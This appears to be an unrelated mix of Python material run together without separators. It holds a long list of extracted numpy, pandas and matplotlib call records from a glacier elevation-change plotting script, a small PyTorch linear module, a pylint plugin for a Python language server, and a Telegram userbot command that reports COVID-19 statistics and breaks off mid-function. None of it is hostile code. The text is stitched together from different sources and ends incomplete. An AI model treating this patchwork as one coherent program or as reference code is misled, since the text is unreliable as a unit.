[((272, 309), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'font.size': 5}"], {}), "({'font.size': 5})\n", (291, 309), True, 'import matplotlib.pyplot as plt\n'), ((310, 356), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'lines.linewidth': 0.35}"], {}), "({'lines.linewidth': 0.35})\n", (329, 356), True, 'import matplotlib.pyplot as plt\n'), ((356, 401), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'axes.linewidth': 0.35}"], {}), "({'axes.linewidth': 0.35})\n", (375, 401), True, 'import matplotlib.pyplot as plt\n'), ((401, 447), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'lines.markersize': 2.5}"], {}), "({'lines.markersize': 2.5})\n", (420, 447), True, 'import matplotlib.pyplot as plt\n'), ((447, 490), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'axes.labelpad': 1.5}"], {}), "({'axes.labelpad': 1.5})\n", (466, 490), True, 'import matplotlib.pyplot as plt\n'), ((676, 696), 'pandas.read_csv', 'pd.read_csv', (['all_csv'], {}), '(all_csv)\n', (687, 696), True, 'import pandas as pd\n'), ((4219, 4249), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(7.2, 9.3)'}), '(figsize=(7.2, 9.3))\n', (4229, 4249), True, 'import matplotlib.pyplot as plt\n'), ((4291, 4335), 'matplotlib.pyplot.GridSpec', 'plt.GridSpec', (['(8)', '(13)'], {'wspace': '(0.05)', 'hspace': '(0.5)'}), '(8, 13, wspace=0.05, hspace=0.5)\n', (4303, 4335), True, 'import matplotlib.pyplot as plt\n'), ((5106, 5124), 'numpy.array', 'np.array', (['vec_bins'], {}), '(vec_bins)\n', (5114, 5124), True, 'import numpy as np\n'), ((5133, 5150), 'numpy.array', 'np.array', (['vec_exp'], {}), '(vec_exp)\n', (5141, 5150), True, 'import numpy as np\n'), ((6221, 6234), 'numpy.array', 'np.array', (['mod'], {}), '(mod)\n', (6229, 6234), True, 'import numpy as np\n'), ((15049, 15067), 'pandas.concat', 'pd.concat', (['list_df'], {}), '(list_df)\n', (15058, 15067), True, 'import pandas as pd\n'), ((17253, 17319), 'pandas.read_csv', 'pd.read_csv', (['"""/home/atom/data/other/Hugonnet_2020/dhdt_int_GP.csv"""'], {}), "('/home/atom/data/other/Hugonnet_2020/dhdt_int_GP.csv')\n", (17264, 17319), True, 'import pandas as pd\n'), ((17328, 17394), 'pandas.read_csv', 'pd.read_csv', (['"""/home/atom/data/other/Hugonnet_2020/dhdt_int_HR.csv"""'], {}), "('/home/atom/data/other/Hugonnet_2020/dhdt_int_HR.csv')\n", (17339, 17394), True, 'import pandas as pd\n'), ((27493, 27515), 'pandas.concat', 'pd.concat', (['list_df_out'], {}), '(list_df_out)\n', (27502, 27515), True, 'import pandas as pd\n'), ((27524, 27538), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (27536, 27538), True, 'import pandas as pd\n'), ((28101, 28115), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (28113, 28115), True, 'import pandas as pd\n'), ((28793, 28828), 'pandas.concat', 'pd.concat', (['[df_all, df_noper, df_g]'], {}), '([df_all, df_noper, df_g])\n', (28802, 28828), True, 'import pandas as pd\n'), ((29359, 29375), 'numpy.arange', 'np.arange', (['(1)', '(22)'], {}), '(1, 22)\n', (29368, 29375), True, 'import numpy as np\n'), ((30838, 30899), 'mpl_toolkits.axes_grid.inset_locator.inset_axes', 'inset_axes', (['ax2'], {'width': '"""15%"""', 'height': '"""50%"""', 'loc': '"""upper right"""'}), "(ax2, width='15%', height='50%', loc='upper right')\n", (30848, 30899), False, 'from mpl_toolkits.axes_grid.inset_locator import inset_axes\n'), ((30916, 30933), 'numpy.arange', 'np.arange', (['(20)', '(22)'], {}), '(20, 22)\n', (30925, 30933), True, 'import numpy as np\n'), ((31812, 
31924), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""/home/atom/ongoing/work_worldwide/figures/final/ED_Figure_5.jpg"""'], {'dpi': '(500)', 'bbox_inches': '"""tight"""'}), "('/home/atom/ongoing/work_worldwide/figures/final/ED_Figure_5.jpg',\n dpi=500, bbox_inches='tight')\n", (31823, 31924), True, 'import matplotlib.pyplot as plt\n'), ((4779, 4830), 'numpy.logical_and', 'np.logical_and', (['(vgm1.bins > 3000)', '(vgm1.bins < 30000)'], {}), '(vgm1.bins > 3000, vgm1.bins < 30000)\n', (4793, 4830), True, 'import numpy as np\n'), ((10128, 10149), 'numpy.arange', 'np.arange', (['(0)', '(3000)', '(1)'], {}), '(0, 3000, 1)\n', (10137, 10149), True, 'import numpy as np\n'), ((12701, 12738), 'numpy.array', 'np.array', (['[0.00126694247, 3.03486839]'], {}), '([0.00126694247, 3.03486839])\n', (12709, 12738), True, 'import numpy as np\n'), ((12754, 12791), 'numpy.array', 'np.array', (['[0.00135708936, 4.05065698]'], {}), '([0.00135708936, 4.05065698])\n', (12762, 12791), True, 'import numpy as np\n'), ((12807, 12844), 'numpy.array', 'np.array', (['[0.00142572733, 4.20851582]'], {}), '([0.00142572733, 4.20851582])\n', (12815, 12844), True, 'import numpy as np\n'), ((12860, 12896), 'numpy.array', 'np.array', (['[0.00182537137, 4.2851592]'], {}), '([0.00182537137, 4.2851592])\n', (12868, 12896), True, 'import numpy as np\n'), ((12913, 12950), 'numpy.array', 'np.array', (['[0.00187250755, 4.31311254]'], {}), '([0.00187250755, 4.31311254])\n', (12921, 12950), True, 'import numpy as np\n'), ((12966, 13002), 'numpy.array', 'np.array', (['[0.0020624962, 4.33582812]'], {}), '([0.0020624962, 4.33582812])\n', (12974, 13002), True, 'import numpy as np\n'), ((13336, 13422), 'functools.partial', 'functools.partial', (['sill_frac'], {'a': 'coefs[i][0]', 'b': 'coefs[i][1]', 'c': 'thresh[i]', 'd': 'ind[i]'}), '(sill_frac, a=coefs[i][0], b=coefs[i][1], c=thresh[i], d=\n ind[i])\n', (13353, 13422), False, 'import functools\n'), ((14805, 14819), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (14817, 14819), True, 'import pandas as pd\n'), ((19462, 19479), 'numpy.nanmean', 'np.nanmean', (['diff2'], {}), '(diff2)\n', (19472, 19479), True, 'import numpy as np\n'), ((21540, 21631), 'numpy.logical_and', 'np.logical_and', (['(df_gp.err_dhdt < vec_err_dhdt[i + 1])', '(df_gp.err_dhdt >= vec_err_dhdt[i])'], {}), '(df_gp.err_dhdt < vec_err_dhdt[i + 1], df_gp.err_dhdt >=\n vec_err_dhdt[i])\n', (21554, 21631), True, 'import numpy as np\n'), ((23920, 24030), 'numpy.logical_and', 'np.logical_and', (['(df_gp.area.values / 1000000 < vec_area[i + 1])', '(df_gp.area.values / 1000000 >= vec_area[i])'], {}), '(df_gp.area.values / 1000000 < vec_area[i + 1], df_gp.area.\n values / 1000000 >= vec_area[i])\n', (23934, 24030), True, 'import numpy as np\n'), ((26210, 26229), 'pandas.read_csv', 'pd.read_csv', (['fn_reg'], {}), '(fn_reg)\n', (26221, 26229), True, 'import pandas as pd\n'), ((26413, 26527), 'numpy.sqrt', 'np.sqrt', (["(df[df.time == '2000-01-01'].err_dh.values[0] ** 2 + df[df.time ==\n '2020-01-01'].err_dh.values[0] ** 2)"], {}), "(df[df.time == '2000-01-01'].err_dh.values[0] ** 2 + df[df.time ==\n '2020-01-01'].err_dh.values[0] ** 2)\n", (26420, 26527), True, 'import numpy as np\n'), ((26556, 26645), 'numpy.sqrt', 'np.sqrt', (['((err_dh * area) ** 2 + (dh * df.perc_err_cont.values[0] / 100.0 * area) ** 2)'], {}), '((err_dh * area) ** 2 + (dh * df.perc_err_cont.values[0] / 100.0 *\n area) ** 2)\n', (26563, 26645), True, 'import numpy as np\n'), ((27169, 27183), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (27181, 
27183), True, 'import pandas as pd\n'), ((28058, 28087), 'numpy.nansum', 'np.nansum', (['df_all.area.values'], {}), '(df_all.area.values)\n', (28067, 28087), True, 'import numpy as np\n'), ((28321, 28395), 'numpy.nansum', 'np.nansum', (['(df_all[ind].sq_err_fromdh.values * df_all[ind].area.values ** 2)'], {}), '(df_all[ind].sq_err_fromdh.values * df_all[ind].area.values ** 2)\n', (28330, 28395), True, 'import numpy as np\n'), ((28463, 28539), 'numpy.nansum', 'np.nansum', (['(df_all[ind].sq_err_fromarea.values * df_all[ind].area.values ** 2)'], {}), '(df_all[ind].sq_err_fromarea.values * df_all[ind].area.values ** 2)\n', (28472, 28539), True, 'import numpy as np\n'), ((28610, 28689), 'numpy.nansum', 'np.nansum', (['(df_all[ind].sq_err_fromdensity.values * df_all[ind].area.values ** 2)'], {}), '(df_all[ind].sq_err_fromdensity.values * df_all[ind].area.values ** 2)\n', (28619, 28689), True, 'import numpy as np\n'), ((28747, 28781), 'numpy.nansum', 'np.nansum', (['df_all[ind].area.values'], {}), '(df_all[ind].area.values)\n', (28756, 28781), True, 'import numpy as np\n'), ((30577, 30609), 'matplotlib.ticker.FormatStrFormatter', 'mtick.FormatStrFormatter', (['"""%.0e"""'], {}), "('%.0e')\n", (30601, 30609), True, 'import matplotlib.ticker as mtick\n'), ((4564, 4613), 'numpy.nanmean', 'np.nanmean', (['vgm1.bins.values[0 + i * 5:5 + i * 5]'], {}), '(vgm1.bins.values[0 + i * 5:5 + i * 5])\n', (4574, 4613), True, 'import numpy as np\n'), ((4623, 4671), 'numpy.nanmean', 'np.nanmean', (['vgm1.exp.values[0 + i * 5:5 + i * 5]'], {}), '(vgm1.exp.values[0 + i * 5:5 + i * 5])\n', (4633, 4671), True, 'import numpy as np\n'), ((4993, 5042), 'numpy.nanmean', 'np.nanmean', (['vgm1.bins.values[0 + i * 5:5 + i * 5]'], {}), '(vgm1.bins.values[0 + i * 5:5 + i * 5])\n', (5003, 5042), True, 'import numpy as np\n'), ((5052, 5100), 'numpy.nanmean', 'np.nanmean', (['vgm1.exp.values[0 + i * 5:5 + i * 5]'], {}), '(vgm1.exp.values[0 + i * 5:5 + i * 5])\n', (5062, 5100), True, 'import numpy as np\n'), ((13481, 13497), 'numpy.arange', 'np.arange', (['(3)', '(31)'], {}), '(3, 31)\n', (13490, 13497), True, 'import numpy as np\n'), ((16768, 16785), 'matplotlib.pyplot.cm.Greys', 'plt.cm.Greys', (['(0.8)'], {}), '(0.8)\n', (16780, 16785), True, 'import matplotlib.pyplot as plt\n'), ((16913, 16930), 'matplotlib.pyplot.cm.Greys', 'plt.cm.Greys', (['(0.8)'], {}), '(0.8)\n', (16925, 16930), True, 'import matplotlib.pyplot as plt\n'), ((21860, 21979), 'numpy.sqrt', 'np.sqrt', (['(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0] ** 2 + df_gp[df_gp.rgiid ==\n rgiid].err_dhdt.values[0] ** 2)'], {}), '(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0] ** 2 + df_gp[df_gp.\n rgiid == rgiid].err_dhdt.values[0] ** 2)\n', (21867, 21979), True, 'import numpy as np\n'), ((22390, 22405), 'pybob.ddem_tools.nmad', 'nmad', (['diff_dhdt'], {}), '(diff_dhdt)\n', (22394, 22405), False, 'from pybob.ddem_tools import nmad\n'), ((22431, 22453), 'numpy.nanmedian', 'np.nanmedian', (['err_dhdt'], {}), '(err_dhdt)\n', (22443, 22453), True, 'import numpy as np\n'), ((22474, 22521), 'numpy.mean', 'np.mean', (['(vec_err_dhdt[i + 1], vec_err_dhdt[i])'], {}), '((vec_err_dhdt[i + 1], vec_err_dhdt[i]))\n', (22481, 22521), True, 'import numpy as np\n'), ((24254, 24373), 'numpy.sqrt', 'np.sqrt', (['(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0] ** 2 + df_gp[df_gp.rgiid ==\n rgiid].err_dhdt.values[0] ** 2)'], {}), '(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0] ** 2 + df_gp[df_gp.\n rgiid == rgiid].err_dhdt.values[0] ** 2)\n', (24261, 24373), True, 'import numpy as 
np\n'), ((24784, 24799), 'pybob.ddem_tools.nmad', 'nmad', (['diff_dhdt'], {}), '(diff_dhdt)\n', (24788, 24799), False, 'from pybob.ddem_tools import nmad\n'), ((24825, 24847), 'numpy.nanmedian', 'np.nanmedian', (['err_dhdt'], {}), '(err_dhdt)\n', (24837, 24847), True, 'import numpy as np\n'), ((24868, 24907), 'numpy.mean', 'np.mean', (['(vec_area[i + 1], vec_area[i])'], {}), '((vec_area[i + 1], vec_area[i]))\n', (24875, 24907), True, 'import numpy as np\n'), ((26138, 26154), 'numpy.arange', 'np.arange', (['(1)', '(20)'], {}), '(1, 20)\n', (26147, 26154), True, 'import numpy as np\n'), ((26768, 26840), 'numpy.sqrt', 'np.sqrt', (['((err_dvol * 0.85 / 10 ** 9) ** 2 + (dvol * 0.06 / 10 ** 9) ** 2)'], {}), '((err_dvol * 0.85 / 10 ** 9) ** 2 + (dvol * 0.06 / 10 ** 9) ** 2)\n', (26775, 26840), True, 'import numpy as np\n'), ((27577, 27629), 'numpy.nansum', 'np.nansum', (['(df_all.dmdtda.values * df_all.area.values)'], {}), '(df_all.dmdtda.values * df_all.area.values)\n', (27586, 27629), True, 'import numpy as np\n'), ((27628, 27657), 'numpy.nansum', 'np.nansum', (['df_all.area.values'], {}), '(df_all.area.values)\n', (27637, 27657), True, 'import numpy as np\n'), ((27684, 27748), 'numpy.nansum', 'np.nansum', (['(df_all.sq_err_fromdh.values * df_all.area.values ** 2)'], {}), '(df_all.sq_err_fromdh.values * df_all.area.values ** 2)\n', (27693, 27748), True, 'import numpy as np\n'), ((27809, 27875), 'numpy.nansum', 'np.nansum', (['(df_all.sq_err_fromarea.values * df_all.area.values ** 2)'], {}), '(df_all.sq_err_fromarea.values * df_all.area.values ** 2)\n', (27818, 27875), True, 'import numpy as np\n'), ((27939, 28008), 'numpy.nansum', 'np.nansum', (['(df_all.sq_err_fromdensity.values * df_all.area.values ** 2)'], {}), '(df_all.sq_err_fromdensity.values * df_all.area.values ** 2)\n', (27948, 28008), True, 'import numpy as np\n'), ((28196, 28258), 'numpy.nansum', 'np.nansum', (['(df_all[ind].dmdtda.values * df_all[ind].area.values)'], {}), '(df_all[ind].dmdtda.values * df_all[ind].area.values)\n', (28205, 28258), True, 'import numpy as np\n'), ((28257, 28291), 'numpy.nansum', 'np.nansum', (['df_all[ind].area.values'], {}), '(df_all[ind].area.values)\n', (28266, 28291), True, 'import numpy as np\n'), ((28395, 28429), 'numpy.nansum', 'np.nansum', (['df_all[ind].area.values'], {}), '(df_all[ind].area.values)\n', (28404, 28429), True, 'import numpy as np\n'), ((28539, 28573), 'numpy.nansum', 'np.nansum', (['df_all[ind].area.values'], {}), '(df_all[ind].area.values)\n', (28548, 28573), True, 'import numpy as np\n'), ((28689, 28723), 'numpy.nansum', 'np.nansum', (['df_all[ind].area.values'], {}), '(df_all[ind].area.values)\n', (28698, 28723), True, 'import numpy as np\n'), ((31626, 31658), 'matplotlib.ticker.FormatStrFormatter', 'mtick.FormatStrFormatter', (['"""%.0e"""'], {}), "('%.0e')\n", (31650, 31658), True, 'import matplotlib.ticker as mtick\n'), ((2225, 2257), 'numpy.nanmean', 'np.nanmean', (['df_c.exp.values[1:2]'], {}), '(df_c.exp.values[1:2])\n', (2235, 2257), True, 'import numpy as np\n'), ((2297, 2334), 'numpy.nanmean', 'np.nanmean', (["df_c['count'].values[1:2]"], {}), "(df_c['count'].values[1:2])\n", (2307, 2334), True, 'import numpy as np\n'), ((2375, 2419), 'numpy.nanmean', 'np.nanmean', (['df_c.exp.values[20 - 10:20 + 10]'], {}), '(df_c.exp.values[20 - 10:20 + 10])\n', (2385, 2419), True, 'import numpy as np\n'), ((2462, 2511), 'numpy.nanmean', 'np.nanmean', (["df_c['count'].values[20 - 10:20 + 10]"], {}), "(df_c['count'].values[20 - 10:20 + 10])\n", (2472, 2511), True, 'import numpy as 
np\n'), ((2552, 2596), 'numpy.nanmean', 'np.nanmean', (['df_c.exp.values[50 - 10:50 + 10]'], {}), '(df_c.exp.values[50 - 10:50 + 10])\n', (2562, 2596), True, 'import numpy as np\n'), ((2639, 2688), 'numpy.nanmean', 'np.nanmean', (["df_c['count'].values[50 - 10:50 + 10]"], {}), "(df_c['count'].values[50 - 10:50 + 10])\n", (2649, 2688), True, 'import numpy as np\n'), ((5385, 5415), 'numpy.arange', 'np.arange', (['(30000)', '(3000000)', '(100)'], {}), '(30000, 3000000, 100)\n', (5394, 5415), True, 'import numpy as np\n'), ((10001, 10014), 'numpy.array', 'np.array', (['dts'], {}), '(dts)\n', (10009, 10014), True, 'import numpy as np\n'), ((19545, 19565), 'numpy.array', 'np.array', (['list_area2'], {}), '(list_area2)\n', (19553, 19565), True, 'import numpy as np\n'), ((22539, 22557), 'numpy.nansum', 'np.nansum', (['ci_size'], {}), '(ci_size)\n', (22548, 22557), True, 'import numpy as np\n'), ((24925, 24943), 'numpy.nansum', 'np.nansum', (['ci_size'], {}), '(ci_size)\n', (24934, 24943), True, 'import numpy as np\n'), ((27748, 27777), 'numpy.nansum', 'np.nansum', (['df_all.area.values'], {}), '(df_all.area.values)\n', (27757, 27777), True, 'import numpy as np\n'), ((27875, 27904), 'numpy.nansum', 'np.nansum', (['df_all.area.values'], {}), '(df_all.area.values)\n', (27884, 27904), True, 'import numpy as np\n'), ((28008, 28037), 'numpy.nansum', 'np.nansum', (['df_all.area.values'], {}), '(df_all.area.values)\n', (28017, 28037), True, 'import numpy as np\n'), ((29623, 29643), 'numpy.array', 'np.array', (['(i, i + 1)'], {}), '((i, i + 1))\n', (29631, 29643), True, 'import numpy as np\n'), ((29719, 29739), 'numpy.array', 'np.array', (['(i, i + 1)'], {}), '((i, i + 1))\n', (29727, 29739), True, 'import numpy as np\n'), ((29818, 29838), 'numpy.array', 'np.array', (['(i, i + 1)'], {}), '((i, i + 1))\n', (29826, 29838), True, 'import numpy as np\n'), ((30474, 30494), 'numpy.arange', 'np.arange', (['(1.5)', '(20.5)'], {}), '(1.5, 20.5)\n', (30483, 30494), True, 'import numpy as np\n'), ((31181, 31201), 'numpy.array', 'np.array', (['(i, i + 1)'], {}), '((i, i + 1))\n', (31189, 31201), True, 'import numpy as np\n'), ((31277, 31297), 'numpy.array', 'np.array', (['(i, i + 1)'], {}), '((i, i + 1))\n', (31285, 31297), True, 'import numpy as np\n'), ((31376, 31396), 'numpy.array', 'np.array', (['(i, i + 1)'], {}), '((i, i + 1))\n', (31384, 31396), True, 'import numpy as np\n'), ((2757, 2800), 'numpy.nanmean', 'np.nanmean', (['df_c.exp.values[20 - 5:20 + 20]'], {}), '(df_c.exp.values[20 - 5:20 + 20])\n', (2767, 2800), True, 'import numpy as np\n'), ((2836, 2885), 'numpy.nanmean', 'np.nanmean', (["df_c['count'].values[20 - 10:20 + 10]"], {}), "(df_c['count'].values[20 - 10:20 + 10])\n", (2846, 2885), True, 'import numpy as np\n'), ((2919, 2963), 'numpy.nanmean', 'np.nanmean', (['df_c.exp.values[50 - 10:50 + 10]'], {}), '(df_c.exp.values[50 - 10:50 + 10])\n', (2929, 2963), True, 'import numpy as np\n'), ((2999, 3048), 'numpy.nanmean', 'np.nanmean', (["df_c['count'].values[50 - 10:50 + 10]"], {}), "(df_c['count'].values[50 - 10:50 + 10])\n", (3009, 3048), True, 'import numpy as np\n'), ((5324, 5345), 'numpy.arange', 'np.arange', (['(0)', '(3000)', '(1)'], {}), '(0, 3000, 1)\n', (5333, 5345), True, 'import numpy as np\n'), ((5352, 5378), 'numpy.arange', 'np.arange', (['(3000)', '(30000)', '(10)'], {}), '(3000, 30000, 10)\n', (5361, 5378), True, 'import numpy as np\n'), ((10016, 10039), 'numpy.isnan', 'np.isnan', (['arr_res[:, i]'], {}), '(arr_res[:, i])\n', (10024, 10039), True, 'import numpy as np\n'), ((14350, 
14386), 'numpy.nansum', 'np.nansum', (['(err_corr[:, k] * nsamp_dt)'], {}), '(err_corr[:, k] * nsamp_dt)\n', (14359, 14386), True, 'import numpy as np\n'), ((14389, 14408), 'numpy.nansum', 'np.nansum', (['nsamp_dt'], {}), '(nsamp_dt)\n', (14398, 14408), True, 'import numpy as np\n'), ((14723, 14789), 'pyddem.volint_tools.neff_circ', 'neff_circ', (['area', "[(tmp_length, 'Sph', final_num_err_corr[k] ** 2)]"], {}), "(area, [(tmp_length, 'Sph', final_num_err_corr[k] ** 2)])\n", (14732, 14789), False, 'from pyddem.volint_tools import neff_circ, std_err\n'), ((15422, 15442), 'numpy.array', 'np.array', (['list_areas'], {}), '(list_areas)\n', (15430, 15442), True, 'import numpy as np\n'), ((15561, 15581), 'numpy.array', 'np.array', (['list_areas'], {}), '(list_areas)\n', (15569, 15581), True, 'import numpy as np\n'), ((19497, 19512), 'numpy.array', 'np.array', (['diff2'], {}), '(diff2)\n', (19505, 19512), True, 'import numpy as np\n'), ((19513, 19533), 'numpy.array', 'np.array', (['list_area2'], {}), '(list_area2)\n', (19521, 19533), True, 'import numpy as np\n'), ((22236, 22250), 'numpy.isnan', 'np.isnan', (['diff'], {}), '(diff)\n', (22244, 22250), True, 'import numpy as np\n'), ((22632, 22649), 'numpy.isnan', 'np.isnan', (['ci_size'], {}), '(ci_size)\n', (22640, 22649), True, 'import numpy as np\n'), ((24630, 24644), 'numpy.isnan', 'np.isnan', (['diff'], {}), '(diff)\n', (24638, 24644), True, 'import numpy as np\n'), ((25018, 25035), 'numpy.isnan', 'np.isnan', (['ci_size'], {}), '(ci_size)\n', (25026, 25035), True, 'import numpy as np\n'), ((3114, 3158), 'numpy.nanmean', 'np.nanmean', (['df_c.exp.values[20 - 10:20 + 30]'], {}), '(df_c.exp.values[20 - 10:20 + 30])\n', (3124, 3158), True, 'import numpy as np\n'), ((3194, 3243), 'numpy.nanmean', 'np.nanmean', (["df_c['count'].values[20 - 10:20 + 30]"], {}), "(df_c['count'].values[20 - 10:20 + 30])\n", (3204, 3243), True, 'import numpy as np\n'), ((3277, 3321), 'numpy.nanmean', 'np.nanmean', (['df_c.exp.values[50 - 40:50 + 40]'], {}), '(df_c.exp.values[50 - 40:50 + 40])\n', (3287, 3321), True, 'import numpy as np\n'), ((3357, 3406), 'numpy.nanmean', 'np.nanmean', (["df_c['count'].values[50 - 40:50 + 40]"], {}), "(df_c['count'].values[50 - 40:50 + 40])\n", (3367, 3406), True, 'import numpy as np\n'), ((10064, 10087), 'numpy.isnan', 'np.isnan', (['arr_res[:, i]'], {}), '(arr_res[:, i])\n', (10072, 10087), True, 'import numpy as np\n'), ((10350, 10382), 'numpy.sin', 'np.sin', (['(x / 365.2224 * 2 * np.pi)'], {}), '(x / 365.2224 * 2 * np.pi)\n', (10356, 10382), True, 'import numpy as np\n'), ((10426, 10458), 'numpy.sin', 'np.sin', (['(x / 365.2224 * 2 * np.pi)'], {}), '(x / 365.2224 * 2 * np.pi)\n', (10432, 10458), True, 'import numpy as np\n'), ((10464, 10496), 'numpy.sin', 'np.sin', (['(x / 365.2224 * 2 * np.pi)'], {}), '(x / 365.2224 * 2 * np.pi)\n', (10470, 10496), True, 'import numpy as np\n'), ((22036, 22048), 'numpy.abs', 'np.abs', (['diff'], {}), '(diff)\n', (22042, 22048), True, 'import numpy as np\n'), ((22116, 22170), 'numpy.abs', 'np.abs', (['df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0]'], {}), '(df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0])\n', (22122, 22170), True, 'import numpy as np\n'), ((22576, 22593), 'numpy.isnan', 'np.isnan', (['ci_size'], {}), '(ci_size)\n', (22584, 22593), True, 'import numpy as np\n'), ((22938, 22967), 'numpy.round', 'np.round', (['(nb_95ci[i] * 100)', '(0)'], {}), '(nb_95ci[i] * 100, 0)\n', (22946, 22967), True, 'import numpy as np\n'), ((24430, 24442), 'numpy.abs', 'np.abs', (['diff'], {}), '(diff)\n', 
(24436, 24442), True, 'import numpy as np\n'), ((24510, 24564), 'numpy.abs', 'np.abs', (['df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0]'], {}), '(df_gp[df_gp.rgiid == rgiid].err_dhdt.values[0])\n', (24516, 24564), True, 'import numpy as np\n'), ((24962, 24979), 'numpy.isnan', 'np.isnan', (['ci_size'], {}), '(ci_size)\n', (24970, 24979), True, 'import numpy as np\n'), ((25228, 25257), 'numpy.round', 'np.round', (['(nb_95ci[i] * 100)', '(0)'], {}), '(nb_95ci[i] * 100, 0)\n', (25236, 25257), True, 'import numpy as np\n'), ((22055, 22109), 'numpy.abs', 'np.abs', (['df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0]'], {}), '(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0])\n', (22061, 22109), True, 'import numpy as np\n'), ((24449, 24503), 'numpy.abs', 'np.abs', (['df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0]'], {}), '(df_hr[df_hr.rgiid == rgiid].err_dhdt.values[0])\n', (24455, 24503), True, 'import numpy as np\n'), ((19260, 19277), 'numpy.nanmean', 'np.nanmean', (['diff2'], {}), '(diff2)\n', (19270, 19277), True, 'import numpy as np\n'), ((19305, 19316), 'pybob.ddem_tools.nmad', 'nmad', (['diff2'], {}), '(diff2)\n', (19309, 19316), False, 'from pybob.ddem_tools import nmad\n')]
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class Message(nn.Module):
def __init__(self, d_model1, d_model2):
super().__init__()
self.fc_gate1 = nn.Linear(d_model1, d_model2, bias=False)
self.fc_gate2 = nn.Linear(d_model1, d_model2, bias=False)
#self.fc_gate1 = nn.Conv1d(d_model1, d_model2, kernel_size = 1, bias=False)
#self.fc_gate2 = nn.Conv1d(d_model2, d_model2, kernel_size = 1, bias=False)
#self.bn1 = nn.BatchNorm1d(d_model2)
#self.bn2 = nn.BatchNorm1d(d_model2)
#self.re1 = nn.ReLU()
#self.re2 = nn.ReLU()
def forward(self, x1):
g1 = self.fc_gate1(x1)
#g1 = self.re1(self.bn1(self.fc_gate1(x1)))
#g2 = self.re2(self.bn2(self.fc_gate2(g1)))
return g1
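
# Illustrative usage sketch (not part of the original module; the sizes below
# are assumed for demonstration):
#
#   msg = Message(d_model1=64, d_model2=32)
#   x = torch.randn(8, 64)    # batch of 8 input feature vectors
#   out = msg(x)               # shape (8, 32); only fc_gate1 is applied
#
# Note that fc_gate2 is constructed in __init__ but never used in forward().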
|
[
"torch.nn.Linear"
] |
[((190, 231), 'torch.nn.Linear', 'nn.Linear', (['d_model1', 'd_model2'], {'bias': '(False)'}), '(d_model1, d_model2, bias=False)\n', (199, 231), True, 'import torch.nn as nn\n'), ((256, 297), 'torch.nn.Linear', 'nn.Linear', (['d_model1', 'd_model2'], {'bias': '(False)'}), '(d_model1, d_model2, bias=False)\n', (265, 297), True, 'import torch.nn as nn\n')]
|
# Copyright 2018 SUSE, Inc.
import os
import logging
import pylint.config
import pylint.lint
import pylint.reporters
from pyls import hookimpl, lsp
log = logging.getLogger(__name__)
@hookimpl
def pyls_lint(config, document, on_change):
settings = config.plugin_settings('pylint')
log.debug("Got pylint settings: %s", settings)
collector = DiagCollector()
if not on_change:
log.debug('Running pylint on \'%s\' in \'%s\'', document.path, os.getcwd())
pylint.lint.Run(args=[document.path], reporter=collector, exit=False)
return [map_diagnostic(diag, document.lines) for diag in collector.messages]
class DiagCollector(pylint.reporters.CollectingReporter):
def display_reports(self, layout):
"""do nothing"""
def _display(self, layout):
"""do nothing"""
def map_diagnostic(message, lines):
severity = lsp.DiagnosticSeverity.Warning
if message.category in ['fatal', 'error']:
severity = lsp.DiagnosticSeverity.Error
# LSP lines start at 0, while pylint starts at 1
err_range = {
'start': {'line': message.line - 1, 'character': message.column},
'end': {
# FIXME: It's a little naive to mark until the end of the line, can we not easily do better?
'line': message.line - 1,
'character': len(lines[message.line - 1]) - 1
},
}
return {
'source': 'pylint',
'range': err_range,
'message': message.msg.split('\n')[0],
'code': message.symbol,
'severity': severity
}
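
# For illustration (hypothetical values): a pylint message reported at line=3,
# column=4 with symbol 'unused-import' maps to a diagnostic whose range starts
# at {'line': 2, 'character': 4}, since LSP positions are zero-based while
# pylint's line numbers are one-based.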
|
[
"os.getcwd",
"logging.getLogger"
] |
[((155, 182), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (172, 182), False, 'import logging\n'), ((464, 475), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (473, 475), False, 'import os\n')]
|
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
# Port to UserBot by @MoveAngel
from covid import Covid
from userbot import CMD_HELP
from userbot.events import register
@register(outgoing=True, pattern=r"^\.covid(?: |$)(.*)")
async def corona(event):
await event.edit("`Processing...`")
query = event.pattern_match.group(1)
country = query or "world"
covid = Covid(source="worldometers")
try:
country_data = covid.get_status_by_country_name(country)
output_text = (
f"`Confirmed : {format_integer(country_data['confirmed'])}`\n" +
f"`Active : {format_integer(country_data['active'])}`\n" +
f"`Deaths : {format_integer(country_data['deaths'])}`\n" +
f"`Recovered : {format_integer(country_data['recovered'])}`\n\n" +
f"`New Cases : {format_integer(country_data['new_cases'])}`\n" +
f"`New Deaths : {format_integer(country_data['new_deaths'])}`\n" +
f"`Critical : {format_integer(country_data['critical'])}`\n" +
f"`Total Tests : {format_integer(country_data['total_tests'])}`\n\n" +
f"Data provided by [Worldometer](https://www.worldometers.info/coronavirus/country/{country})")
await event.edit(f"Corona Virus Info in {country}:\n\n{output_text}")
except ValueError:
await event.edit(f"No information found for: {country}!")
def format_integer(number, thousand_separator="."):
def reverse(string):
string = "".join(reversed(string))
return string
s = reverse(str(number))
count = 0
result = ""
for char in s:
